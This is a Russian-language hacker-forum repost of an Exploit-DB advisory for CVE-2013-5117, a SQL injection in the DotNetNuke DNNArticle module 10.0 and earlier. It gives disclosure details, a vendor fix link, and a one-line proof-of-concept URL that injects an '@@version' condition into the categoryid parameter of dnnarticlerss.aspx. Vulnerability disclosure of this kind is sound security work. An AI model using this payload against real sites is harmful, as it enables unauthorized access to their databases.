Exploit DotNetNuke DNNArticle Module 10.0 - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
27602
Проверка EDB
  1. Пройдено
Автор
SAJJAD POURALI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2013-5117
Дата публикации
2013-08-15
Код:
Title: DotNetNuke (DNNArticle Module) SQL Injection Vulnerability
References: CVE-2013-5117
Discovered by: Sajjad Pourali

Vendor http://www.zldnn.com/ , http://www.dnnarticle.com/‎
Vendor advisory: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
Vendor contact: 2013-8-14

Solution: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
 
Remote: yes
Authentication required: no
User interaction required: no
Impact: High
 
Affected:

 - DNNArticle 10.0 and earlier

---

PoC:

http://server/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version
 
---
 
 + Sajjad Pourali
 + http://www.securation.com/
 + http://www.cert.um.ac.ir/
 + Contact: sajjad[at]securation.com
 
Источник
www.exploit-db.com

Похожие темы